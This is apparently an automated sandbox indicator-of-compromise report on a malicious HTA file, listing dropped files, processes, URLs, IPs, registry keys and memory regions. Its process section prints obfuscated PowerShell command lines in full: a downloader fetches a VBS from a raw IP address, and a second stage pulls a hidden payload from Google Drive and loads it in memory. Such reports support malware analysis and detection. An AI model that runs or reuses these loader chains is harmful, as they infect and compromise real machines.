IOC Report
greatthingswithmegood.hta

loading gif

Files

File Path
Type
Category
Malicious
greatthingswithmegood.hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seemethebestthingswithgreatneedswithgoodformewith[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RES2C04.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Oct 30 08:53:37 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3naoor5k.5yp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3uedb00j.rtm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5iobkwo4.heg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ew0gpcgm.twz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivn5hzdv.akk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3lnxuof.jm1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nixedkto.5sj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pljapn4x.hno.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tcmxgj35.r32.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5mmzdje.0bl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (365)
dropped
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.out
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
modified
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\greatthingswithmegood.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ly0yjdqb\ly0yjdqb.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2C04.tmp" "c:\Users\user\AppData\Local\Temp\ly0yjdqb\CSC746F8121F2314519843BE09F69B09E4D.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF
198.46.178.151
malicious
https://drive.google.com
unknown
malicious
https://drive.usercontent.googleXb2
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://crl.micro
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF&
unknown
http://crl.micMt
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.usercontent.google.com
unknown
http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFb.2l
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
There are 13 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.185.206
198.187.3.20.in-addr.arpa
unknown

IPs

IP
Domain
Country
Malicious
198.46.178.151
unknown
United States
malicious
142.250.185.206
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
53B3000
trusted library allocation
page read and write
6E80000
heap
page execute and read and write
4E29000
heap
page read and write
6183000
heap
page read and write
7300000
trusted library allocation
page read and write
5438000
trusted library allocation
page read and write
48C9000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
29F7000
heap
page read and write
3040000
heap
page readonly
8FD000
heap
page read and write
297E000
heap
page read and write
705E000
stack
page read and write
2A2A000
heap
page read and write
830000
heap
page read and write
72C8000
heap
page read and write
7FB30000
trusted library allocation
page execute and read and write
4EAB000
heap
page read and write
594D000
heap
page read and write
5663000
heap
page read and write
8FD000
heap
page read and write
5DA8000
trusted library allocation
page read and write
6190000
heap
page read and write
5050000
heap
page execute and read and write
8330000
trusted library allocation
page execute and read and write
847000
heap
page read and write
6167000
heap
page read and write
2C7E000
stack
page read and write
29F3000
heap
page read and write
4240000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
729B000
stack
page read and write
5F50000
trusted library allocation
page read and write
857000
heap
page read and write
4BA5000
heap
page execute and read and write
85C000
heap
page read and write
8BF0000
trusted library allocation
page read and write
4BA0000
heap
page execute and read and write
79A0000
trusted library allocation
page read and write
423D000
trusted library allocation
page execute and read and write
6195000
heap
page read and write
7780000
trusted library allocation
page read and write
618B000
heap
page read and write
7047000
heap
page read and write
5901000
heap
page read and write
616B000
heap
page read and write
2A82000
heap
page read and write
D70000
heap
page read and write
6169000
heap
page read and write
33C9000
heap
page read and write
738F000
stack
page read and write
50CE000
stack
page read and write
48B0000
trusted library allocation
page read and write
6177000
heap
page read and write
759D000
stack
page read and write
6177000
heap
page read and write
782000
direct allocation
page read and write
6143000
heap
page read and write
509B000
stack
page read and write
4DA3000
heap
page read and write
4260000
trusted library allocation
page read and write
6BDB000
stack
page read and write
2BEE000
stack
page read and write
6144000
heap
page read and write
7810000
trusted library allocation
page read and write
803000
heap
page read and write
4B67000
trusted library allocation
page read and write
47E0000
heap
page read and write
2A2A000
heap
page read and write
6183000
heap
page read and write
5BD1000
heap
page read and write
85C000
heap
page read and write
2CBE000
stack
page read and write
73D0000
heap
page read and write
594A000
heap
page read and write
4FBE000
stack
page read and write
6183000
heap
page read and write
6111000
heap
page read and write
5658000
heap
page read and write
2FE0000
heap
page read and write
72D0000
trusted library allocation
page read and write
8624000
heap
page read and write
562F000
heap
page read and write
5881000
trusted library allocation
page read and write
2FB0000
trusted library allocation
page read and write
4720000
trusted library allocation
page execute and read and write
617C000
heap
page read and write
3072000
trusted library allocation
page read and write
72FC000
heap
page read and write
5C2A000
heap
page read and write
6195000
heap
page read and write
6205000
trusted library allocation
page read and write
659E000
stack
page read and write
5BD1000
heap
page read and write
8FD000
heap
page read and write
6162000
heap
page read and write
47FF000
trusted library allocation
page read and write
8170000
heap
page read and write
6061000
trusted library allocation
page read and write
42CE000
stack
page read and write
42D0000
heap
page read and write
2A90000
heap
page read and write
8657000
heap
page read and write
4DA0000
heap
page read and write
2A82000
heap
page read and write
3075000
trusted library allocation
page execute and read and write
6C5C000
stack
page read and write
6159000
heap
page read and write
6080000
heap
page read and write
5A2F000
trusted library allocation
page read and write
71DD000
stack
page read and write
482F000
heap
page read and write
778D000
trusted library allocation
page read and write
29E1000
heap
page read and write
4790000
heap
page execute and read and write
5656000
heap
page read and write
4DE8000
heap
page read and write
5899000
heap
page read and write
2FA3000
trusted library allocation
page execute and read and write
8490000
heap
page read and write
73F9000
heap
page read and write
851000
heap
page read and write
27A0000
heap
page read and write
6179000
heap
page read and write
618B000
heap
page read and write
732B000
heap
page read and write
615A000
heap
page read and write
7660000
trusted library allocation
page read and write
85B1000
trusted library allocation
page read and write
4DE8000
heap
page read and write
7337000
heap
page read and write
164E000
stack
page read and write
77F0000
trusted library allocation
page read and write
5C26000
heap
page read and write
4249000
trusted library allocation
page read and write
2A82000
heap
page read and write
5FD0000
heap
page read and write
616B000
heap
page read and write
2855000
heap
page read and write
4DB0000
heap
page read and write
464E000
stack
page read and write
780000
direct allocation
page read and write
2AA8000
heap
page read and write
2FCA000
trusted library allocation
page execute and read and write
49B7000
trusted library allocation
page read and write
8040000
trusted library allocation
page execute and read and write
7342000
heap
page read and write
861F000
heap
page read and write
617C000
heap
page read and write
47F1000
trusted library allocation
page read and write
618B000
heap
page read and write
6A5E000
stack
page read and write
56C6000
heap
page read and write
2FA0000
trusted library allocation
page read and write
5871000
trusted library allocation
page read and write
8F1000
heap
page read and write
8250000
trusted library allocation
page read and write
6BDE000
stack
page read and write
79C0000
trusted library allocation
page read and write
815A000
heap
page read and write
6539000
trusted library allocation
page read and write
48BC000
trusted library allocation
page read and write
7D00000
heap
page read and write
2BD8000
heap
page read and write
8E7000
heap
page read and write
3070000
trusted library allocation
page read and write
51F8000
trusted library allocation
page read and write
2A82000
heap
page read and write
4FB2000
trusted library allocation
page read and write
6143000
heap
page read and write
591B000
heap
page read and write
705E000
stack
page read and write
565B000
heap
page read and write
6143000
heap
page read and write
7620000
trusted library allocation
page read and write
5935000
heap
page read and write
76E9000
heap
page read and write
2A01000
heap
page read and write
2A43000
heap
page read and write
2A56000
heap
page read and write
880E000
stack
page read and write
7485000
heap
page read and write
3059000
trusted library allocation
page read and write
3168000
heap
page read and write
7033000
heap
page read and write
2D3C000
heap
page read and write
918000
heap
page read and write
6B1E000
stack
page read and write
8ED000
heap
page read and write
2AA5000
heap
page read and write
74A6000
heap
page read and write
586A000
heap
page read and write
60A8000
heap
page read and write
4DB4000
heap
page read and write
29F3000
heap
page read and write
5EE5000
trusted library allocation
page read and write
595D000
heap
page read and write
88E000
heap
page read and write
4DE8000
heap
page read and write
29F7000
heap
page read and write
6166000
heap
page read and write
2A3E000
heap
page read and write
77D0000
trusted library allocation
page read and write
4589000
trusted library allocation
page read and write
6DA0000
trusted library allocation
page execute and read and write
7552000
trusted library allocation
page read and write
5A20000
trusted library allocation
page read and write
775C000
heap
page read and write
723D000
stack
page read and write
854000
heap
page read and write
6195000
heap
page read and write
5541000
trusted library allocation
page read and write
617E000
heap
page read and write
30E0000
heap
page readonly
5873000
trusted library allocation
page read and write
71BF000
stack
page read and write
918000
heap
page read and write
49F7000
heap
page read and write
2A3A000
heap
page read and write
884F000
stack
page read and write
769E000
stack
page read and write
5C2D000
heap
page read and write
617C000
heap
page read and write
8615000
trusted library allocation
page read and write
4ECF000
heap
page read and write
711E000
stack
page read and write
6183000
heap
page read and write
783E000
stack
page read and write
29F0000
heap
page read and write
4660000
heap
page readonly
7240000
trusted library allocation
page read and write
73D4000
heap
page read and write
77DE000
stack
page read and write
6162000
heap
page read and write
5FF0000
trusted library allocation
page read and write
6FEB000
heap
page read and write
589C000
heap
page read and write
8154000
heap
page read and write
85C0000
heap
page read and write
7290000
trusted library allocation
page read and write
471D000
stack
page read and write
4826000
heap
page read and write
751E000
stack
page read and write
D6E000
direct allocation
page read and write
178F000
stack
page read and write
7240000
heap
page execute and read and write
2860000
heap
page read and write
2FE5000
heap
page read and write
5BD0000
heap
page read and write
84B0000
trusted library allocation
page read and write
5783000
heap
page read and write
594A000
heap
page read and write
6EAA000
stack
page read and write
7910000
trusted library allocation
page execute and read and write
8E7000
heap
page read and write
923000
heap
page read and write
69DB000
stack
page read and write
6171000
heap
page read and write
8060000
heap
page read and write
833000
heap
page read and write
2F50000
heap
page read and write
499E000
stack
page read and write
3122000
heap
page read and write
5DDB000
heap
page read and write
2FF0000
heap
page read and write
594A000
heap
page read and write
48F3000
trusted library allocation
page read and write
6FC0000
heap
page read and write
5DD0000
trusted library allocation
page read and write
4510000
heap
page read and write
5785000
heap
page read and write
5C66000
heap
page read and write
7250000
trusted library allocation
page execute and read and write
84DE000
stack
page read and write
75B0000
trusted library allocation
page read and write
8665000
heap
page read and write
5658000
heap
page read and write
5858000
trusted library allocation
page read and write
711E000
stack
page read and write
919000
heap
page read and write
616B000
heap
page read and write
771E000
stack
page read and write
76E5000
heap
page read and write
751E000
stack
page read and write
80E000
heap
page read and write
5894000
heap
page read and write
64FE000
trusted library allocation
page read and write
4548000
heap
page read and write
7142000
heap
page read and write
3068000
heap
page read and write
70DE000
stack
page read and write
A5E000
stack
page read and write
6E2A000
stack
page read and write
297C000
heap
page read and write
86C000
heap
page read and write
6179000
heap
page read and write
617C000
heap
page read and write
57CE000
heap
page read and write
617C000
heap
page read and write
5709000
heap
page read and write
48C4000
trusted library allocation
page read and write
564E000
heap
page read and write
7320000
trusted library allocation
page read and write
82D0000
heap
page read and write
902000
heap
page read and write
7970000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
4AAC000
trusted library allocation
page read and write
2AA8000
heap
page read and write
4B7E000
stack
page read and write
4DAC000
heap
page read and write
68AE000
stack
page read and write
651E000
trusted library allocation
page read and write
2A92000
heap
page read and write
27D0000
heap
page read and write
838000
heap
page read and write
2FB9000
trusted library allocation
page read and write
787F000
stack
page read and write
60DF000
heap
page read and write
5C66000
heap
page read and write
168E000
stack
page read and write
6B5A000
stack
page read and write
29F0000
heap
page read and write
7380000
trusted library allocation
page read and write
5C2F000
heap
page read and write
D40000
direct allocation
page read and write
4280000
trusted library allocation
page read and write
486A000
trusted library allocation
page read and write
2A43000
heap
page read and write
8F0000
heap
page read and write
7458000
heap
page read and write
75E0000
trusted library allocation
page read and write
1330000
heap
page read and write
6179000
heap
page read and write
82BD000
stack
page read and write
4A90000
trusted library allocation
page read and write
6FE8000
heap
page read and write
6113000
heap
page read and write
587E000
trusted library allocation
page read and write
2DD6000
heap
page read and write
2CF7000
heap
page read and write
6195000
heap
page read and write
734C000
heap
page read and write
847000
heap
page read and write
4AA6000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
FF0000
heap
page read and write
29CE000
heap
page read and write
7448000
heap
page read and write
4850000
heap
page execute and read and write
1F0000
heap
page read and write
5813000
trusted library allocation
page read and write
8150000
heap
page read and write
5C5B000
heap
page read and write
6171000
heap
page read and write
6E85000
heap
page execute and read and write
6C1C000
stack
page read and write
84BF000
stack
page read and write
5663000
heap
page read and write
57F1000
trusted library allocation
page read and write
84D0000
trusted library allocation
page read and write
6177000
heap
page read and write
5C18000
heap
page read and write
5C17000
heap
page read and write
6166000
heap
page read and write
830000
heap
page read and write
7640000
heap
page read and write
7790000
trusted library allocation
page read and write
2C50000
heap
page read and write
45A2000
trusted library allocation
page read and write
4E31000
heap
page read and write
7435000
heap
page read and write
2A01000
heap
page read and write
5D69000
trusted library allocation
page read and write
5571000
heap
page read and write
7286000
trusted library allocation
page read and write
7724000
heap
page read and write
4BB0000
heap
page read and write
2A86000
heap
page read and write
617E000
heap
page read and write
734E000
stack
page read and write
31AD000
heap
page read and write
5950000
heap
page read and write
4AEE000
stack
page read and write
2D3E000
stack
page read and write
55B2000
heap
page read and write
882000
heap
page read and write
72E0000
trusted library allocation
page read and write
84C0000
trusted library allocation
page read and write
682E000
stack
page read and write
58C8000
trusted library allocation
page read and write
617E000
heap
page read and write
728B000
stack
page read and write
7930000
trusted library allocation
page read and write
5E30000
trusted library allocation
page execute
8FF000
heap
page read and write
7920000
trusted library allocation
page read and write
2A28000
heap
page read and write
617E000
heap
page read and write
805000
heap
page read and write
504D000
stack
page read and write
76F7000
heap
page read and write
6FF7000
heap
page read and write
6BE0000
heap
page read and write
7444000
heap
page read and write
465E000
stack
page read and write
29E1000
heap
page read and write
4E90000
heap
page read and write
5670000
heap
page read and write
5786000
heap
page read and write
4D91000
heap
page read and write
6183000
heap
page read and write
74F1000
heap
page read and write
72C0000
trusted library allocation
page read and write
2C6C000
heap
page read and write
4DE8000
heap
page read and write
2850000
heap
page read and write
2A38000
heap
page read and write
6D59000
heap
page read and write
6179000
heap
page read and write
2D17000
heap
page read and write
5C66000
heap
page read and write
724C000
stack
page read and write
6183000
heap
page read and write
5F5F000
heap
page read and write
4650000
heap
page read and write
617E000
heap
page read and write
84FE000
stack
page read and write
90A000
heap
page read and write
2B30000
heap
page read and write
6ECE000
stack
page read and write
835000
heap
page read and write
6143000
heap
page read and write
6EB0000
heap
page read and write
60AF000
heap
page read and write
293E000
heap
page read and write
61F4000
trusted library allocation
page read and write
7039000
heap
page read and write
6171000
heap
page read and write
79B0000
trusted library allocation
page read and write
4DE4000
heap
page read and write
5C24000
heap
page read and write
4F7E000
stack
page read and write
8612000
heap
page read and write
805000
heap
page read and write
705D000
heap
page read and write
4D8F000
stack
page read and write
2CBA000
heap
page read and write
6195000
heap
page read and write
CCF000
stack
page read and write
8510000
trusted library allocation
page read and write
79D0000
trusted library allocation
page read and write
5A2B000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
4815000
trusted library allocation
page read and write
72FF000
